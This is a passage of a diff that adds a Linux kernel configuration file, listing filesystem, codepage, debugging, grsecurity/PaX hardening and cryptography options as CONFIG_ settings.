+# CONFIG_FANOTIFY_ACCESS_PERMISSIONS is not set
+CONFIG_QUOTA=y
+# CONFIG_QUOTA_NETLINK_INTERFACE is not set
+CONFIG_PRINT_QUOTA_WARNING=y
+# CONFIG_QUOTA_DEBUG is not set
+# CONFIG_QFMT_V1 is not set
+# CONFIG_QFMT_V2 is not set
+CONFIG_QUOTACTL=y
+CONFIG_QUOTACTL_COMPAT=y
+# CONFIG_AUTOFS4_FS is not set
+CONFIG_FUSE_FS=y
+# CONFIG_CUSE is not set
+CONFIG_OVERLAY_FS=y
+
+#
+# Caches
+#
+CONFIG_FSCACHE=y
+# CONFIG_FSCACHE_STATS is not set
+# CONFIG_FSCACHE_HISTOGRAM is not set
+# CONFIG_FSCACHE_DEBUG is not set
+# CONFIG_FSCACHE_OBJECT_LIST is not set
+# CONFIG_CACHEFILES is not set
+
+#
+# CD-ROM/DVD Filesystems
+#
+CONFIG_ISO9660_FS=y
+CONFIG_JOLIET=y
+CONFIG_ZISOFS=y
+CONFIG_UDF_FS=y
+CONFIG_UDF_NLS=y
+
+#
+# DOS/FAT/NT Filesystems
+#
+CONFIG_FAT_FS=y
+CONFIG_MSDOS_FS=y
+CONFIG_VFAT_FS=y
+CONFIG_FAT_DEFAULT_CODEPAGE=437
+CONFIG_FAT_DEFAULT_IOCHARSET="iso8859-1"
+# CONFIG_FAT_DEFAULT_UTF8 is not set
+CONFIG_NTFS_FS=m
+# CONFIG_NTFS_DEBUG is not set
+# CONFIG_NTFS_RW is not set
+
+#
+# Pseudo filesystems
+#
+CONFIG_PROC_FS=y
+CONFIG_PROC_SYSCTL=y
+# CONFIG_PROC_CHILDREN is not set
+CONFIG_KERNFS=y
+CONFIG_SYSFS=y
+CONFIG_TMPFS=y
+CONFIG_TMPFS_POSIX_ACL=y
+CONFIG_TMPFS_XATTR=y
+# CONFIG_HUGETLBFS is not set
+# CONFIG_HUGETLB_PAGE is not set
+CONFIG_ARCH_HAS_GIGANTIC_PAGE=y
+CONFIG_CONFIGFS_FS=y
+CONFIG_EFIVAR_FS=y
+CONFIG_MISC_FILESYSTEMS=y
+# CONFIG_ORANGEFS_FS is not set
+# CONFIG_ADFS_FS is not set
+# CONFIG_AFFS_FS is not set
+CONFIG_ECRYPT_FS=y
+# CONFIG_ECRYPT_FS_MESSAGING is not set
+# CONFIG_HFS_FS is not set
+# CONFIG_HFSPLUS_FS is not set
+# CONFIG_BEFS_FS is not set
+# CONFIG_BFS_FS is not set
+# CONFIG_EFS_FS is not set
+# CONFIG_LOGFS is not set
+# CONFIG_CRAMFS is not set
+CONFIG_SQUASHFS=y
+CONFIG_SQUASHFS_FILE_CACHE=y
+# CONFIG_SQUASHFS_FILE_DIRECT is not set
+CONFIG_SQUASHFS_DECOMP_SINGLE=y
+# CONFIG_SQUASHFS_DECOMP_MULTI is not set
+# CONFIG_SQUASHFS_DECOMP_MULTI_PERCPU is not set
+CONFIG_SQUASHFS_XATTR=y
+CONFIG_SQUASHFS_ZLIB=y
+CONFIG_SQUASHFS_LZ4=y
+CONFIG_SQUASHFS_LZO=y
+CONFIG_SQUASHFS_XZ=y
+# CONFIG_SQUASHFS_4K_DEVBLK_SIZE is not set
+CONFIG_SQUASHFS_EMBEDDED=y
+CONFIG_SQUASHFS_FRAGMENT_CACHE_SIZE=3
+# CONFIG_VXFS_FS is not set
+# CONFIG_MINIX_FS is not set
+# CONFIG_OMFS_FS is not set
+# CONFIG_HPFS_FS is not set
+# CONFIG_QNX4FS_FS is not set
+# CONFIG_QNX6FS_FS is not set
+# CONFIG_ROMFS_FS is not set
+CONFIG_PSTORE=y
+CONFIG_PSTORE_ZLIB_COMPRESS=y
+# CONFIG_PSTORE_LZO_COMPRESS is not set
+# CONFIG_PSTORE_LZ4_COMPRESS is not set
+# CONFIG_PSTORE_CONSOLE is not set
+# CONFIG_PSTORE_PMSG is not set
+# CONFIG_PSTORE_RAM is not set
+# CONFIG_SYSV_FS is not set
+CONFIG_UFS_FS=y
+# CONFIG_UFS_FS_WRITE is not set
+# CONFIG_UFS_DEBUG is not set
+# CONFIG_NETWORK_FILESYSTEMS is not set
+CONFIG_NLS=y
+CONFIG_NLS_DEFAULT="utf-8"
+CONFIG_NLS_CODEPAGE_437=y
+CONFIG_NLS_CODEPAGE_737=y
+CONFIG_NLS_CODEPAGE_775=y
+CONFIG_NLS_CODEPAGE_850=y
+CONFIG_NLS_CODEPAGE_852=y
+CONFIG_NLS_CODEPAGE_855=y
+CONFIG_NLS_CODEPAGE_857=y
+CONFIG_NLS_CODEPAGE_860=y
+CONFIG_NLS_CODEPAGE_861=y
+CONFIG_NLS_CODEPAGE_862=y
+CONFIG_NLS_CODEPAGE_863=y
+CONFIG_NLS_CODEPAGE_864=y
+CONFIG_NLS_CODEPAGE_865=y
+CONFIG_NLS_CODEPAGE_866=y
+CONFIG_NLS_CODEPAGE_869=y
+# CONFIG_NLS_CODEPAGE_936 is not set
+# CONFIG_NLS_CODEPAGE_950 is not set
+# CONFIG_NLS_CODEPAGE_932 is not set
+# CONFIG_NLS_CODEPAGE_949 is not set
+# CONFIG_NLS_CODEPAGE_874 is not set
+# CONFIG_NLS_ISO8859_8 is not set
+# CONFIG_NLS_CODEPAGE_1250 is not set
+# CONFIG_NLS_CODEPAGE_1251 is not set
+CONFIG_NLS_ASCII=y
+CONFIG_NLS_ISO8859_1=y
+CONFIG_NLS_ISO8859_2=y
+CONFIG_NLS_ISO8859_3=y
+CONFIG_NLS_ISO8859_4=y
+CONFIG_NLS_ISO8859_5=y
+CONFIG_NLS_ISO8859_6=y
+CONFIG_NLS_ISO8859_7=y
+CONFIG_NLS_ISO8859_9=y
+CONFIG_NLS_ISO8859_13=y
+CONFIG_NLS_ISO8859_14=y
+CONFIG_NLS_ISO8859_15=y
+# CONFIG_NLS_KOI8_R is not set
+# CONFIG_NLS_KOI8_U is not set
+# CONFIG_NLS_MAC_ROMAN is not set
+# CONFIG_NLS_MAC_CELTIC is not set
+# CONFIG_NLS_MAC_CENTEURO is not set
+# CONFIG_NLS_MAC_CROATIAN is not set
+# CONFIG_NLS_MAC_CYRILLIC is not set
+# CONFIG_NLS_MAC_GAELIC is not set
+# CONFIG_NLS_MAC_GREEK is not set
+# CONFIG_NLS_MAC_ICELAND is not set
+# CONFIG_NLS_MAC_INUIT is not set
+# CONFIG_NLS_MAC_ROMANIAN is not set
+# CONFIG_NLS_MAC_TURKISH is not set
+CONFIG_NLS_UTF8=y
+# CONFIG_DLM is not set
+
+#
+# Kernel hacking
+#
+CONFIG_TRACE_IRQFLAGS_SUPPORT=y
+
+#
+# printk and dmesg options
+#
+# CONFIG_PRINTK_TIME is not set
+CONFIG_MESSAGE_LOGLEVEL_DEFAULT=4
+# CONFIG_BOOT_PRINTK_DELAY is not set
+
+#
+# Compile-time checks and compiler options
+#
+# CONFIG_DEBUG_INFO is not set
+# CONFIG_ENABLE_WARN_DEPRECATED is not set
+# CONFIG_ENABLE_MUST_CHECK is not set
+CONFIG_FRAME_WARN=1024
+# CONFIG_STRIP_ASM_SYMS is not set
+# CONFIG_READABLE_ASM is not set
+# CONFIG_UNUSED_SYMBOLS is not set
+# CONFIG_HEADERS_CHECK is not set
+# CONFIG_DEBUG_SECTION_MISMATCH is not set
+CONFIG_SECTION_MISMATCH_WARN_ONLY=y
+CONFIG_ARCH_WANT_FRAME_POINTERS=y
+# CONFIG_FRAME_POINTER is not set
+# CONFIG_STACK_VALIDATION is not set
+# CONFIG_DEBUG_FORCE_WEAK_PER_CPU is not set
+# CONFIG_MAGIC_SYSRQ is not set
+CONFIG_DEBUG_KERNEL=y
+
+#
+# Memory Debugging
+#
+# CONFIG_PAGE_EXTENSION is not set
+# CONFIG_PAGE_POISONING is not set
+# CONFIG_DEBUG_OBJECTS is not set
+# CONFIG_SLUB_DEBUG_ON is not set
+# CONFIG_SLUB_STATS is not set
+CONFIG_HAVE_DEBUG_KMEMLEAK=y
+# CONFIG_DEBUG_STACK_USAGE is not set
+# CONFIG_DEBUG_VM is not set
+# CONFIG_DEBUG_VIRTUAL is not set
+# CONFIG_DEBUG_MEMORY_INIT is not set
+# CONFIG_DEBUG_PER_CPU_MAPS is not set
+CONFIG_HAVE_DEBUG_STACKOVERFLOW=y
+# CONFIG_DEBUG_STACKOVERFLOW is not set
+CONFIG_HAVE_ARCH_KMEMCHECK=y
+# CONFIG_KMEMCHECK is not set
+CONFIG_HAVE_ARCH_KASAN=y
+# CONFIG_KASAN is not set
+CONFIG_ARCH_HAS_KCOV=y
+# CONFIG_DEBUG_SHIRQ is not set
+
+#
+# Debug Lockups and Hangs
+#
+# CONFIG_LOCKUP_DETECTOR is not set
+# CONFIG_DETECT_HUNG_TASK is not set
+# CONFIG_WQ_WATCHDOG is not set
+# CONFIG_PANIC_ON_OOPS is not set
+CONFIG_PANIC_ON_OOPS_VALUE=0
+CONFIG_PANIC_TIMEOUT=0
+CONFIG_SCHED_DEBUG=y
+CONFIG_SCHED_INFO=y
+# CONFIG_SCHEDSTATS is not set
+# CONFIG_SCHED_STACK_END_CHECK is not set
+# CONFIG_DEBUG_TIMEKEEPING is not set
+# CONFIG_TIMER_STATS is not set
+
+#
+# Lock Debugging (spinlocks, mutexes, etc...)
+#
+# CONFIG_DEBUG_RT_MUTEXES is not set
+# CONFIG_DEBUG_SPINLOCK is not set
+# CONFIG_DEBUG_MUTEXES is not set
+# CONFIG_DEBUG_ATOMIC_SLEEP is not set
+# CONFIG_DEBUG_LOCKING_API_SELFTESTS is not set
+# CONFIG_LOCK_TORTURE_TEST is not set
+# CONFIG_STACKTRACE is not set
+# CONFIG_DEBUG_KOBJECT is not set
+CONFIG_DEBUG_BUGVERBOSE=y
+CONFIG_DEBUG_LIST=y
+# CONFIG_DEBUG_PI_LIST is not set
+# CONFIG_DEBUG_SG is not set
+# CONFIG_DEBUG_NOTIFIERS is not set
+# CONFIG_DEBUG_CREDENTIALS is not set
+
+#
+# RCU Debugging
+#
+# CONFIG_PROVE_RCU is not set
+# CONFIG_SPARSE_RCU_POINTER is not set
+# CONFIG_TORTURE_TEST is not set
+# CONFIG_RCU_PERF_TEST is not set
+# CONFIG_RCU_TORTURE_TEST is not set
+CONFIG_RCU_CPU_STALL_TIMEOUT=21
+# CONFIG_RCU_TRACE is not set
+# CONFIG_RCU_EQS_DEBUG is not set
+# CONFIG_DEBUG_WQ_FORCE_RR_CPU is not set
+# CONFIG_DEBUG_BLOCK_EXT_DEVT is not set
+# CONFIG_CPU_HOTPLUG_STATE_CONTROL is not set
+# CONFIG_FAULT_INJECTION is not set
+CONFIG_USER_STACKTRACE_SUPPORT=y
+CONFIG_HAVE_FUNCTION_TRACER=y
+CONFIG_HAVE_FUNCTION_GRAPH_TRACER=y
+CONFIG_HAVE_DYNAMIC_FTRACE=y
+CONFIG_HAVE_DYNAMIC_FTRACE_WITH_REGS=y
+CONFIG_HAVE_FTRACE_MCOUNT_RECORD=y
+CONFIG_HAVE_SYSCALL_TRACEPOINTS=y
+CONFIG_HAVE_FENTRY=y
+CONFIG_HAVE_C_RECORDMCOUNT=y
+
+#
+# Runtime Testing
+#
+# CONFIG_TEST_LIST_SORT is not set
+# CONFIG_KPROBES_SANITY_TEST is not set
+# CONFIG_BACKTRACE_SELF_TEST is not set
+# CONFIG_RBTREE_TEST is not set
+# CONFIG_INTERVAL_TREE_TEST is not set
+# CONFIG_PERCPU_TEST is not set
+# CONFIG_ATOMIC64_SELFTEST is not set
+# CONFIG_ASYNC_RAID6_TEST is not set
+# CONFIG_TEST_HEXDUMP is not set
+# CONFIG_TEST_STRING_HELPERS is not set
+# CONFIG_TEST_KSTRTOX is not set
+# CONFIG_TEST_PRINTF is not set
+# CONFIG_TEST_BITMAP is not set
+# CONFIG_TEST_UUID is not set
+# CONFIG_TEST_RHASHTABLE is not set
+# CONFIG_TEST_HASH is not set
+# CONFIG_DMA_API_DEBUG is not set
+# CONFIG_TEST_LKM is not set
+# CONFIG_TEST_USER_COPY is not set
+# CONFIG_TEST_BPF is not set
+# CONFIG_TEST_FIRMWARE is not set
+# CONFIG_TEST_UDELAY is not set
+# CONFIG_MEMTEST is not set
+# CONFIG_TEST_STATIC_KEYS is not set
+# CONFIG_SAMPLES is not set
+CONFIG_HAVE_ARCH_KGDB=y
+# CONFIG_KGDB is not set
+CONFIG_ARCH_HAS_UBSAN_SANITIZE_ALL=y
+# CONFIG_ARCH_WANTS_UBSAN_NO_NULL is not set
+# CONFIG_UBSAN is not set
+CONFIG_ARCH_HAS_DEVMEM_IS_ALLOWED=y
+CONFIG_STRICT_DEVMEM=y
+# CONFIG_IO_STRICT_DEVMEM is not set
+# CONFIG_X86_VERBOSE_BOOTUP is not set
+CONFIG_EARLY_PRINTK=y
+# CONFIG_EARLY_PRINTK_DBGP is not set
+# CONFIG_EARLY_PRINTK_EFI is not set
+# CONFIG_X86_PTDUMP_CORE is not set
+# CONFIG_EFI_PGT_DUMP is not set
+CONFIG_DEBUG_RODATA_TEST=y
+# CONFIG_DEBUG_NX_TEST is not set
+CONFIG_DOUBLEFAULT=y
+# CONFIG_DEBUG_TLBFLUSH is not set
+# CONFIG_IOMMU_STRESS is not set
+CONFIG_HAVE_MMIOTRACE_SUPPORT=y
+# CONFIG_X86_DECODER_SELFTEST is not set
+CONFIG_IO_DELAY_TYPE_0X80=0
+CONFIG_IO_DELAY_TYPE_0XED=1
+CONFIG_IO_DELAY_TYPE_UDELAY=2
+CONFIG_IO_DELAY_TYPE_NONE=3
+CONFIG_IO_DELAY_0X80=y
+# CONFIG_IO_DELAY_0XED is not set
+# CONFIG_IO_DELAY_UDELAY is not set
+# CONFIG_IO_DELAY_NONE is not set
+CONFIG_DEFAULT_IO_DELAY_TYPE=0
+# CONFIG_CPA_DEBUG is not set
+# CONFIG_OPTIMIZE_INLINING is not set
+# CONFIG_DEBUG_ENTRY is not set
+# CONFIG_DEBUG_NMI_SELFTEST is not set
+# CONFIG_X86_DEBUG_FPU is not set
+
+#
+# Security options
+#
+
+#
+# Grsecurity
+#
+CONFIG_PAX_PER_CPU_PGD=y
+CONFIG_TASK_SIZE_MAX_SHIFT=42
+CONFIG_GRKERNSEC=y
+# CONFIG_GRKERNSEC_CONFIG_AUTO is not set
+CONFIG_GRKERNSEC_CONFIG_CUSTOM=y
+CONFIG_GRKERNSEC_PROC_GID=4
+CONFIG_GRKERNSEC_TPE_TRUSTED_GID=100
+CONFIG_GRKERNSEC_SYMLINKOWN_GID=15
+
+#
+# Customize Configuration
+#
+
+#
+# PaX
+#
+CONFIG_PAX=y
+
+#
+# PaX Control
+#
+# CONFIG_PAX_SOFTMODE is not set
+# CONFIG_PAX_EI_PAX is not set
+CONFIG_PAX_PT_PAX_FLAGS=y
+CONFIG_PAX_XATTR_PAX_FLAGS=y
+# CONFIG_PAX_NO_ACL_FLAGS is not set
+CONFIG_PAX_HAVE_ACL_FLAGS=y
+# CONFIG_PAX_HOOK_ACL_FLAGS is not set
+
+#
+# Non-executable pages
+#
+CONFIG_PAX_NOEXEC=y
+CONFIG_PAX_PAGEEXEC=y
+CONFIG_PAX_EMUTRAMP=y
+CONFIG_PAX_MPROTECT=y
+# CONFIG_PAX_MPROTECT_COMPAT is not set
+# CONFIG_PAX_ELFRELOCS is not set
+CONFIG_PAX_KERNEXEC=y
+CONFIG_PAX_KERNEXEC_PLUGIN=y
+# CONFIG_PAX_KERNEXEC_PLUGIN_METHOD_NONE is not set
+CONFIG_PAX_KERNEXEC_PLUGIN_METHOD_BTS=y
+
+#
+# Address Space Layout Randomization
+#
+CONFIG_PAX_ASLR=y
+CONFIG_PAX_RANDKSTACK=y
+CONFIG_PAX_RANDUSTACK=y
+CONFIG_PAX_RANDMMAP=y
+
+#
+# Miscellaneous hardening features
+#
+CONFIG_PAX_MEMORY_SANITIZE=y
+CONFIG_PAX_MEMORY_STACKLEAK=y
+CONFIG_PAX_MEMORY_STRUCTLEAK=y
+CONFIG_PAX_MEMORY_UDEREF=y
+CONFIG_PAX_REFCOUNT=y
+CONFIG_PAX_USERCOPY=y
+CONFIG_PAX_CONSTIFY_PLUGIN=y
+# CONFIG_PAX_USERCOPY_DEBUG is not set
+CONFIG_PAX_SIZE_OVERFLOW=y
+CONFIG_PAX_SIZE_OVERFLOW_EXTRA=y
+# CONFIG_PAX_INITIFY is not set
+CONFIG_HAVE_PAX_INITIFY_INIT_EXIT=y
+CONFIG_PAX_LATENT_ENTROPY=y
+CONFIG_PAX_RAP=y
+
+#
+# Memory Protections
+#
+CONFIG_GRKERNSEC_KMEM=y
+CONFIG_GRKERNSEC_IO=y
+CONFIG_GRKERNSEC_BPF_HARDEN=y
+CONFIG_GRKERNSEC_PERF_HARDEN=y
+CONFIG_GRKERNSEC_RAND_THREADSTACK=y
+CONFIG_GRKERNSEC_PROC_MEMMAP=y
+CONFIG_GRKERNSEC_KSTACKOVERFLOW=y
+CONFIG_GRKERNSEC_BRUTE=y
+CONFIG_GRKERNSEC_MODHARDEN=y
+CONFIG_GRKERNSEC_HIDESYM=y
+CONFIG_GRKERNSEC_RANDSTRUCT=y
+CONFIG_GRKERNSEC_RANDSTRUCT_PERFORMANCE=y
+CONFIG_GRKERNSEC_KERN_LOCKOUT=y
+
+#
+# Role Based Access Control Options
+#
+# CONFIG_GRKERNSEC_NO_RBAC is not set
+CONFIG_GRKERNSEC_ACL_HIDEKERN=y
+CONFIG_GRKERNSEC_ACL_MAXTRIES=3
+CONFIG_GRKERNSEC_ACL_TIMEOUT=30
+
+#
+# Filesystem Protections
+#
+CONFIG_GRKERNSEC_PROC=y
+# CONFIG_GRKERNSEC_PROC_USER is not set
+CONFIG_GRKERNSEC_PROC_USERGROUP=y
+CONFIG_GRKERNSEC_PROC_ADD=y
+CONFIG_GRKERNSEC_LINK=y
+CONFIG_GRKERNSEC_SYMLINKOWN=y
+CONFIG_GRKERNSEC_FIFO=y
+# CONFIG_GRKERNSEC_SYSFS_RESTRICT is not set
+CONFIG_GRKERNSEC_ROFS=y
+CONFIG_GRKERNSEC_DEVICE_SIDECHANNEL=y
+CONFIG_GRKERNSEC_CHROOT=y
+CONFIG_GRKERNSEC_CHROOT_MOUNT=y
+CONFIG_GRKERNSEC_CHROOT_DOUBLE=y
+CONFIG_GRKERNSEC_CHROOT_PIVOT=y
+CONFIG_GRKERNSEC_CHROOT_CHDIR=y
+CONFIG_GRKERNSEC_CHROOT_CHMOD=y
+CONFIG_GRKERNSEC_CHROOT_FCHDIR=y
+CONFIG_GRKERNSEC_CHROOT_MKNOD=y
+CONFIG_GRKERNSEC_CHROOT_SHMAT=y
+CONFIG_GRKERNSEC_CHROOT_UNIX=y
+CONFIG_GRKERNSEC_CHROOT_FINDTASK=y
+CONFIG_GRKERNSEC_CHROOT_NICE=y
+CONFIG_GRKERNSEC_CHROOT_SYSCTL=y
+CONFIG_GRKERNSEC_CHROOT_RENAME=y
+CONFIG_GRKERNSEC_CHROOT_CAPS=y
+CONFIG_GRKERNSEC_CHROOT_INITRD=y
+
+#
+# Kernel Auditing
+#
+CONFIG_GRKERNSEC_AUDIT_GROUP=y
+CONFIG_GRKERNSEC_AUDIT_GID=99
+CONFIG_GRKERNSEC_EXECLOG=y
+CONFIG_GRKERNSEC_RESLOG=y
+CONFIG_GRKERNSEC_CHROOT_EXECLOG=y
+CONFIG_GRKERNSEC_AUDIT_PTRACE=y
+CONFIG_GRKERNSEC_AUDIT_CHDIR=y
+CONFIG_GRKERNSEC_AUDIT_MOUNT=y
+CONFIG_GRKERNSEC_SIGNAL=y
+CONFIG_GRKERNSEC_FORKFAIL=y
+CONFIG_GRKERNSEC_TIME=y
+CONFIG_GRKERNSEC_PROC_IPADDR=y
+CONFIG_GRKERNSEC_RWXMAP_LOG=y
+
+#
+# Executable Protections
+#
+CONFIG_GRKERNSEC_DMESG=y
+CONFIG_GRKERNSEC_HARDEN_PTRACE=y
+CONFIG_GRKERNSEC_PTRACE_READEXEC=y
+CONFIG_GRKERNSEC_SETXID=y
+CONFIG_GRKERNSEC_HARDEN_IPC=y
+CONFIG_GRKERNSEC_HARDEN_TTY=y
+CONFIG_GRKERNSEC_TPE=y
+CONFIG_GRKERNSEC_TPE_ALL=y
+CONFIG_GRKERNSEC_TPE_INVERT=y
+CONFIG_GRKERNSEC_TPE_GID=100
+
+#
+# Network Protections
+#
+CONFIG_GRKERNSEC_BLACKHOLE=y
+CONFIG_GRKERNSEC_NO_SIMULT_CONNECT=y
+CONFIG_GRKERNSEC_SOCKET=y
+CONFIG_GRKERNSEC_SOCKET_ALL=y
+CONFIG_GRKERNSEC_SOCKET_ALL_GID=200
+CONFIG_GRKERNSEC_SOCKET_CLIENT=y
+CONFIG_GRKERNSEC_SOCKET_CLIENT_GID=15
+CONFIG_GRKERNSEC_SOCKET_SERVER=y
+CONFIG_GRKERNSEC_SOCKET_SERVER_GID=99
+
+#
+# Physical Protections
+#
+CONFIG_GRKERNSEC_DENYUSB=y
+# CONFIG_GRKERNSEC_DENYUSB_FORCE is not set
+
+#
+# Sysctl Support
+#
+CONFIG_GRKERNSEC_SYSCTL=y
+CONFIG_GRKERNSEC_SYSCTL_DISTRO=y
+# CONFIG_GRKERNSEC_SYSCTL_ON is not set
+
+#
+# Logging Options
+#
+CONFIG_GRKERNSEC_FLOODTIME=10
+CONFIG_GRKERNSEC_FLOODBURST=6
+CONFIG_KEYS=y
+# CONFIG_PERSISTENT_KEYRINGS is not set
+# CONFIG_BIG_KEYS is not set
+CONFIG_ENCRYPTED_KEYS=y
+# CONFIG_KEY_DH_OPERATIONS is not set
+# CONFIG_SECURITY_DMESG_RESTRICT is not set
+CONFIG_SECURITY=y
+# CONFIG_SECURITYFS is not set
+CONFIG_SECURITY_NETWORK=y
+CONFIG_SECURITY_NETWORK_XFRM=y
+CONFIG_SECURITY_PATH=y
+# CONFIG_INTEL_TXT is not set
+CONFIG_HAVE_ARCH_HARDENED_USERCOPY=y
+CONFIG_HARDENED_USERCOPY=y
+# CONFIG_SECURITY_SMACK is not set
+# CONFIG_SECURITY_TOMOYO is not set
+# CONFIG_SECURITY_APPARMOR is not set
+# CONFIG_SECURITY_LOADPIN is not set
+CONFIG_INTEGRITY=y
+# CONFIG_INTEGRITY_SIGNATURE is not set
+# CONFIG_IMA is not set
+# CONFIG_EVM is not set
+CONFIG_DEFAULT_SECURITY_DAC=y
+CONFIG_DEFAULT_SECURITY=""
+CONFIG_XOR_BLOCKS=y
+CONFIG_ASYNC_CORE=y
+CONFIG_ASYNC_MEMCPY=y
+CONFIG_ASYNC_XOR=y
+CONFIG_ASYNC_PQ=y
+CONFIG_ASYNC_RAID6_RECOV=y
+CONFIG_CRYPTO=y
+
+#
+# Crypto core or helper
+#
+CONFIG_CRYPTO_ALGAPI=y
+CONFIG_CRYPTO_ALGAPI2=y
+CONFIG_CRYPTO_AEAD=y
+CONFIG_CRYPTO_AEAD2=y
+CONFIG_CRYPTO_BLKCIPHER=y
+CONFIG_CRYPTO_BLKCIPHER2=y
+CONFIG_CRYPTO_HASH=y
+CONFIG_CRYPTO_HASH2=y
+CONFIG_CRYPTO_RNG=y
+CONFIG_CRYPTO_RNG2=y
+CONFIG_CRYPTO_RNG_DEFAULT=y
+CONFIG_CRYPTO_AKCIPHER2=y
+CONFIG_CRYPTO_AKCIPHER=y
+CONFIG_CRYPTO_KPP2=y
+CONFIG_CRYPTO_RSA=y
+# CONFIG_CRYPTO_DH is not set
+# CONFIG_CRYPTO_ECDH is not set
+CONFIG_CRYPTO_MANAGER=y
+CONFIG_CRYPTO_MANAGER2=y
+# CONFIG_CRYPTO_USER is not set
+CONFIG_CRYPTO_MANAGER_DISABLE_TESTS=y
+CONFIG_CRYPTO_GF128MUL=y
+CONFIG_CRYPTO_NULL=y
+CONFIG_CRYPTO_NULL2=y
+# CONFIG_CRYPTO_PCRYPT is not set
+CONFIG_CRYPTO_WORKQUEUE=y
+# CONFIG_CRYPTO_CRYPTD is not set
+# CONFIG_CRYPTO_MCRYPTD is not set
+CONFIG_CRYPTO_AUTHENC=y
+# CONFIG_CRYPTO_TEST is not set
+
+#
+# Authenticated Encryption with Associated Data
+#
+CONFIG_CRYPTO_CCM=y
+CONFIG_CRYPTO_GCM=y
+# CONFIG_CRYPTO_CHACHA20POLY1305 is not set
+CONFIG_CRYPTO_SEQIV=y
+CONFIG_CRYPTO_ECHAINIV=y
+
+#
+# Block modes
+#
+CONFIG_CRYPTO_CBC=y
+CONFIG_CRYPTO_CTR=y
+CONFIG_CRYPTO_CTS=y
+CONFIG_CRYPTO_ECB=y
+# CONFIG_CRYPTO_LRW is not set
+# CONFIG_CRYPTO_PCBC is not set
+CONFIG_CRYPTO_XTS=y
+# CONFIG_CRYPTO_KEYWRAP is not set
+
+#
+# Hash modes
+#
+CONFIG_CRYPTO_CMAC=y
+CONFIG_CRYPTO_HMAC=y
+# CONFIG_CRYPTO_XCBC is not set
+# CONFIG_CRYPTO_VMAC is not set
+
+#
+# Digest
+#
+CONFIG_CRYPTO_CRC32C=y
+CONFIG_CRYPTO_CRC32C_INTEL=y
+CONFIG_CRYPTO_CRC32=y
+# CONFIG_CRYPTO_CRC32_PCLMUL is not set
+CONFIG_CRYPTO_CRCT10DIF=y
+# CONFIG_CRYPTO_CRCT10DIF_PCLMUL is not set
+CONFIG_CRYPTO_GHASH=y
+# CONFIG_CRYPTO_POLY1305 is not set
+# CONFIG_CRYPTO_POLY1305_X86_64 is not set
+# CONFIG_CRYPTO_MD4 is not set
+CONFIG_CRYPTO_MD5=y
+CONFIG_CRYPTO_MICHAEL_MIC=y
+# CONFIG_CRYPTO_RMD128 is not set
+# CONFIG_CRYPTO_RMD160 is not set
+# CONFIG_CRYPTO_RMD256 is not set
+# CONFIG_CRYPTO_RMD320 is not set
+CONFIG_CRYPTO_SHA1=y
+# CONFIG_CRYPTO_SHA1_SSSE3 is not set
+# CONFIG_CRYPTO_SHA256_SSSE3 is not set
+# CONFIG_CRYPTO_SHA512_SSSE3 is not set
+# CONFIG_CRYPTO_SHA1_MB is not set
+# CONFIG_CRYPTO_SHA256_MB is not set
+# CONFIG_CRYPTO_SHA512_MB is not set
+CONFIG_CRYPTO_SHA256=y
+# CONFIG_CRYPTO_SHA512 is not set
+# CONFIG_CRYPTO_SHA3 is not set
+# CONFIG_CRYPTO_TGR192 is not set
+# CONFIG_CRYPTO_WP512 is not set
+# CONFIG_CRYPTO_GHASH_CLMUL_NI_INTEL is not set
+
+#
+# Ciphers
+#
+CONFIG_CRYPTO_AES=y
+# CONFIG_CRYPTO_AES_X86_64 is not set
+# CONFIG_CRYPTO_AES_NI_INTEL is not set
+# CONFIG_CRYPTO_ANUBIS is not set
+CONFIG_CRYPTO_ARC4=y
+# CONFIG_CRYPTO_BLOWFISH is not set
+# CONFIG_CRYPTO_BLOWFISH_X86_64 is not set
+# CONFIG_CRYPTO_CAMELLIA is not set
+# CONFIG_CRYPTO_CAMELLIA_X86_64 is not set
+# CONFIG_CRYPTO_CAMELLIA_AESNI_AVX_X86_64 is not set
+# CONFIG_CRYPTO_CAMELLIA_AESNI_AVX2_X86_64 is not set
+# CONFIG_CRYPTO_CAST5 is not set
+# CONFIG_CRYPTO_CAST5_AVX_X86_64 is not set
+# CONFIG_CRYPTO_CAST6 is not set
+# CONFIG_CRYPTO_CAST6_AVX_X86_64 is not set
+CONFIG_CRYPTO_DES=y
+# CONFIG_CRYPTO_DES3_EDE_X86_64 is not set
+# CONFIG_CRYPTO_FCRYPT is not set
+# CONFIG_CRYPTO_KHAZAD is not set
+# CONFIG_CRYPTO_SALSA20 is not set
+# CONFIG_CRYPTO_SALSA20_X86_64 is not set
+# CONFIG_CRYPTO_CHACHA20 is not set
+# CONFIG_CRYPTO_CHACHA20_X86_64 is not set
+# CONFIG_CRYPTO_SEED is not set
+# CONFIG_CRYPTO_SERPENT is not set
+# CONFIG_CRYPTO_SERPENT_SSE2_X86_64 is not set
+# CONFIG_CRYPTO_SERPENT_AVX_X86_64 is not set
+# CONFIG_CRYPTO_SERPENT_AVX2_X86_64 is not set
+# CONFIG_CRYPTO_TEA is not set
+# CONFIG_CRYPTO_TWOFISH is not set
+# CONFIG_CRYPTO_TWOFISH_X86_64 is not set
+# CONFIG_CRYPTO_TWOFISH_X86_64_3WAY is not set
+# CONFIG_CRYPTO_TWOFISH_AVX_X86_64 is not set
+
+#
+# Compression
+#
+CONFIG_CRYPTO_DEFLATE=y
+CONFIG_CRYPTO_LZO=y
+# CONFIG_CRYPTO_842 is not set
+# CONFIG_CRYPTO_LZ4 is not set
+# CONFIG_CRYPTO_LZ4HC is not set
+
+#
+# Random Number Generation
+#
+CONFIG_CRYPTO_ANSI_CPRNG=y
+CONFIG_CRYPTO_DRBG_MENU=y
+CONFIG_CRYPTO_DRBG_HMAC=y
+# CONFIG_CRYPTO_DRBG_HASH is not set
+# CONFIG_CRYPTO_DRBG_CTR is not set
+CONFIG_CRYPTO_DRBG=y
+CONFIG_CRYPTO_JITTERENTROPY=y
+# CONFIG_CRYPTO_USER_API_HASH is not set
+# CONFIG_CRYPTO_USER_API_SKCIPHER is not set
+# CONFIG_CRYPTO_USER_API_RNG is not set
+# CONFIG_CRYPTO_USER_API_AEAD is not set
+CONFIG_CRYPTO_HASH_INFO=y
+# CONFIG_CRYPTO_HW is not set
+CONFIG_ASYMMETRIC_KEY_TYPE=y
+CONFIG_ASYMMETRIC_PUBLIC_KEY_SUBTYPE=y
+CONFIG_X509_CERTIFICATE_PARSER=y
+CONFIG_PKCS7_MESSAGE_PARSER=y
+# CONFIG_PKCS7_TEST_KEY is not set
+# CONFIG_SIGNED_PE_FILE_VERIFICATION is not set
+
+#
+# Certificates for signature checking
+#
